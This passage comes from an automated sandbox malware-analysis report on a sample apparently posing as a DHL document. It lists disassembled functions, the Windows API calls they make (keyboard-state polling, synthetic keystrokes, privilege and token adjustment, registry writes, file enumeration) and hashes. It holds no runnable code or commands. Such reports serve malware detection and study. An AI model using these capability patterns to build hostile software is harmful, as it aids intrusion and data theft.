                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C8CCD9
                                                                                        • GetKeyState.USER32(00000010), ref: 00C8CCE3
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C8CD0C
                                                                                        • SendMessageW.USER32 ref: 00C8CD33
                                                                                        • SendMessageW.USER32(?,00001030,?,00C8B348), ref: 00C8CE37
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C8CE4D
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C8CE60
                                                                                        • SetCapture.USER32(?), ref: 00C8CE69
                                                                                        • ClientToScreen.USER32(?,?), ref: 00C8CECE
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C8CEDB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C8CEF5
                                                                                        • ReleaseCapture.USER32 ref: 00C8CF00
                                                                                        • GetCursorPos.USER32(?), ref: 00C8CF3A
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C8CF47
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C8CFA3
                                                                                        • SendMessageW.USER32 ref: 00C8CFD1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C8D00E
                                                                                        • SendMessageW.USER32 ref: 00C8D03D
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C8D05E
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C8D06D
                                                                                        • GetCursorPos.USER32(?), ref: 00C8D08D
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C8D09A
                                                                                        • GetParent.USER32(?), ref: 00C8D0BA
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C8D123
                                                                                        • SendMessageW.USER32 ref: 00C8D154
                                                                                        • ClientToScreen.USER32(?,?), ref: 00C8D1B2
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C8D1E2
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C8D20C
                                                                                        • SendMessageW.USER32 ref: 00C8D22F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00C8D281
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C8D2B5
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C8D351
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$@U=u$F
                                                                                        • API String ID: 3977979337-1007936534
                                                                                        • Opcode ID: 2b59fef97770a0785c73cf8c922c7496e2fcd0a46bb7e3acf73450a510d80842
                                                                                        • Instruction ID: 9ff86fe9e045143ba1118b343e2a9143cc39d20c3950d7996eab0255664e4b65
                                                                                        • Opcode Fuzzy Hash: 2b59fef97770a0785c73cf8c922c7496e2fcd0a46bb7e3acf73450a510d80842
                                                                                        • Instruction Fuzzy Hash: F442AE74204640AFDB20EF24C888FAABBE5FF49318F14062DF569872B1C731E941DB69
                                                                                        Function 00C16F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$_memset
                                                                                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                        • API String ID: 1357608183-1798697756
                                                                                        • Opcode ID: 34deec70bb005ef2ce818e3b484ca8fed8fce22e6557f1c28de9927ea339f41b
                                                                                        • Instruction ID: ab7579a34f0e3a63a0002ca4cf0a081b2d6096b8352eff87ba5064917866af88
                                                                                        • Opcode Fuzzy Hash: 34deec70bb005ef2ce818e3b484ca8fed8fce22e6557f1c28de9927ea339f41b
                                                                                        • Instruction Fuzzy Hash: C493C079A04219DBDB24CF98C881BEDB7B1FF49311F24816AED15AB280E7709EC5DB44
                                                                                        Function 00C048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,?), ref: 00C048DF
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C3D665
                                                                                        • IsIconic.USER32(?), ref: 00C3D66E
                                                                                        • ShowWindow.USER32(?,00000009), ref: 00C3D67B
                                                                                        • SetForegroundWindow.USER32(?), ref: 00C3D685
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C3D69B
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00C3D6A2
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C3D6AE
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C3D6BF
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C3D6C7
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00C3D6CF
                                                                                        • SetForegroundWindow.USER32(?), ref: 00C3D6D2
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3D6E7
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00C3D6F2
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3D6FC
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00C3D701
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3D70A
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00C3D70F
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3D719
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00C3D71E
                                                                                        • SetForegroundWindow.USER32(?), ref: 00C3D721
                                                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 00C3D748
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: 80ebd872f46805fa5cf82b6ae1cd6fa78b8ee611feeb55a0cd82406d20f1face
                                                                                        • Instruction ID: 1c84de8516c2b608f9298edd6bf660a9b39c4fc6071aba0de608aa485352d4d3
                                                                                        • Opcode Fuzzy Hash: 80ebd872f46805fa5cf82b6ae1cd6fa78b8ee611feeb55a0cd82406d20f1face
                                                                                        • Instruction Fuzzy Hash: EA319471A50318BBEB206F619C4AF7F7F6CEB44B50F104039FA05EA1D1D6B05D51ABA4
                                                                                        Function 00C58310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5882B
                                                                                          • Part of subcall function 00C587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C58858
                                                                                          • Part of subcall function 00C587E1: GetLastError.KERNEL32 ref: 00C58865
                                                                                        • _memset.LIBCMT ref: 00C58353
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C583A5
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C583B6
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C583CD
                                                                                        • GetProcessWindowStation.USER32 ref: 00C583E6
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00C583F0
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C5840A
                                                                                          • Part of subcall function 00C581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C58309), ref: 00C581E0
                                                                                          • Part of subcall function 00C581CB: CloseHandle.KERNEL32(?,?,00C58309), ref: 00C581F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: ebc3e5460288c8111774f54391318faf37d234cc1b905d6df7a3d91d02888bce
                                                                                        • Instruction ID: 8fa318a74e0d3f35291590d4f4bafdbfd3df2f71fbbaae28a7c0ba7f972f9e38
                                                                                        • Opcode Fuzzy Hash: ebc3e5460288c8111774f54391318faf37d234cc1b905d6df7a3d91d02888bce
                                                                                        • Instruction Fuzzy Hash: B4815B75900209AFEF119FA4DC45AEE7B78EF08305F144169FD24B6161EB318E9DEB28
                                                                                        Function 00C6C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C6C78D
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6C7E1
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C6C806
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C6C81D
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C6C844
                                                                                        • __swprintf.LIBCMT ref: 00C6C890
                                                                                        • __swprintf.LIBCMT ref: 00C6C8D3
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • __swprintf.LIBCMT ref: 00C6C927
                                                                                          • Part of subcall function 00C23698: __woutput_l.LIBCMT ref: 00C236F1
                                                                                        • __swprintf.LIBCMT ref: 00C6C975
                                                                                          • Part of subcall function 00C23698: __flsbuf.LIBCMT ref: 00C23713
                                                                                          • Part of subcall function 00C23698: __flsbuf.LIBCMT ref: 00C2372B
                                                                                        • __swprintf.LIBCMT ref: 00C6C9C4
                                                                                        • __swprintf.LIBCMT ref: 00C6CA13
                                                                                        • __swprintf.LIBCMT ref: 00C6CA62
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 3953360268-2428617273
                                                                                        • Opcode ID: 8c3388d478829e16bf9a53e34b560173972da4831c47233d8488476c07e5fcde
                                                                                        • Instruction ID: 1008654e397af281ceb562dc74572a867e719cead7b80af6d99d802755f37418
                                                                                        • Opcode Fuzzy Hash: 8c3388d478829e16bf9a53e34b560173972da4831c47233d8488476c07e5fcde
                                                                                        • Instruction Fuzzy Hash: 84A12EB1408344ABC714EFA4C885EAFB7ECFF98704F404929F595C7192EA35DA09DB62
                                                                                        Function 00C6EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C6EFB6
                                                                                        • _wcscmp.LIBCMT ref: 00C6EFCB
                                                                                        • _wcscmp.LIBCMT ref: 00C6EFE2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00C6EFF4
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00C6F00E
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C6F026
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F031
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C6F04D
                                                                                        • _wcscmp.LIBCMT ref: 00C6F074
                                                                                        • _wcscmp.LIBCMT ref: 00C6F08B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6F09D
                                                                                        • SetCurrentDirectoryW.KERNEL32(00CB8920), ref: 00C6F0BB
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6F0C5
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F0D2
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F0E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: cb360a64739eb9f51f9434eb38c5df6300d52f44e971f161f6993b36f788c5f1
                                                                                        • Instruction ID: 8e413c5f24fcc3f7d5f0e781e2fd0d98b24a4d9107bcea9388ee352063052f9f
                                                                                        • Opcode Fuzzy Hash: cb360a64739eb9f51f9434eb38c5df6300d52f44e971f161f6993b36f788c5f1
                                                                                        • Instruction Fuzzy Hash: 2531D5325012196BDF24EFB4EC89BEE77AC9F48360F10017AE914D20A1DB70DB46DB65
                                                                                        Function 00C80857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C80953
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C8F910,00000000,?,00000000,?,?), ref: 00C809C1
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C80A09
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C80A92
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00C80DB2
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C80DBF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: 22ec6ddd987ca620f906435cb8776e86aedce5b7192833164839a977cc6713ce
                                                                                        • Instruction ID: 11eaacd5664102d3d9c90fb2c93f77262f0eb4cc06ac87a004e4a10923071df8
                                                                                        • Opcode Fuzzy Hash: 22ec6ddd987ca620f906435cb8776e86aedce5b7192833164839a977cc6713ce
                                                                                        • Instruction Fuzzy Hash: 42029C756046019FCB54EF24C881E2AB7E4FF89324F14856DF89A9B3A2CB30ED45DB85
                                                                                        Function 00C6F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C6F113
                                                                                        • _wcscmp.LIBCMT ref: 00C6F128
                                                                                        • _wcscmp.LIBCMT ref: 00C6F13F
                                                                                          • Part of subcall function 00C64385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C643A0
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C6F16E
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F179
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C6F195
                                                                                        • _wcscmp.LIBCMT ref: 00C6F1BC
                                                                                        • _wcscmp.LIBCMT ref: 00C6F1D3
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6F1E5
                                                                                        • SetCurrentDirectoryW.KERNEL32(00CB8920), ref: 00C6F203
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6F20D
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F21A
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6F22C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: 857575287a4324fc41fc7afc5ae058b7f9849ebdf20c75ef41cbc7ffa30fd53f
                                                                                        • Instruction ID: 3f008372bea5a91989c9d2fc6fd0f610fed073088f27110579a2a84677b5d7b9
                                                                                        • Opcode Fuzzy Hash: 857575287a4324fc41fc7afc5ae058b7f9849ebdf20c75ef41cbc7ffa30fd53f
                                                                                        • Instruction Fuzzy Hash: 80319036500219AADF24AFA4FC99BEE77AC9F45360F100179E914E21A0DB70DF46DF68
                                                                                        Function 00C6A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C6A20F
                                                                                        • __swprintf.LIBCMT ref: 00C6A231
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C6A26E
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C6A293
                                                                                        • _memset.LIBCMT ref: 00C6A2B2
                                                                                        • _wcsncpy.LIBCMT ref: 00C6A2EE
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C6A323
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C6A32E
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00C6A337
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C6A341
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        • Opcode ID: c620cfc39468577dc8f2764319785dbbb53f66b43a6b9aa68cadadb1a35938db
                                                                                        • Instruction ID: 856620df4b231c45e620e7606810eda5eab091af015d257156a0f7cbd1c7a9ea
                                                                                        • Opcode Fuzzy Hash: c620cfc39468577dc8f2764319785dbbb53f66b43a6b9aa68cadadb1a35938db
                                                                                        • Instruction Fuzzy Hash: 9E318F71500119ABDB219FA0DC89FEF77BCEF88741F1041BAF519E2160EA7097458B25
                                                                                        Function 00C166E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                        • API String ID: 0-4052911093
                                                                                        • Opcode ID: 9ae57853421f4b5bbe89effe3c062be6f783fe542def3984ff252a9ac4952e3a
                                                                                        • Instruction ID: 576c503ae2e75503a585ae4a1bebc97cc8ff55543acd62e531a0cd956b4aa6c2
                                                                                        • Opcode Fuzzy Hash: 9ae57853421f4b5bbe89effe3c062be6f783fe542def3984ff252a9ac4952e3a
                                                                                        • Instruction Fuzzy Hash: 6B728EB5E00219DBDB14CF59C8907EEB7B5FF49310F14816AEC19EB290EB309A85DB94
                                                                                        Function 00C6001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00C60097
                                                                                        • SetKeyboardState.USER32(?), ref: 00C60102
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00C60122
                                                                                        • GetKeyState.USER32(000000A0), ref: 00C60139
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00C60168
                                                                                        • GetKeyState.USER32(000000A1), ref: 00C60179
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00C601A5
                                                                                        • GetKeyState.USER32(00000011), ref: 00C601B3
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00C601DC
                                                                                        • GetKeyState.USER32(00000012), ref: 00C601EA
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00C60213
                                                                                        • GetKeyState.USER32(0000005B), ref: 00C60221
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
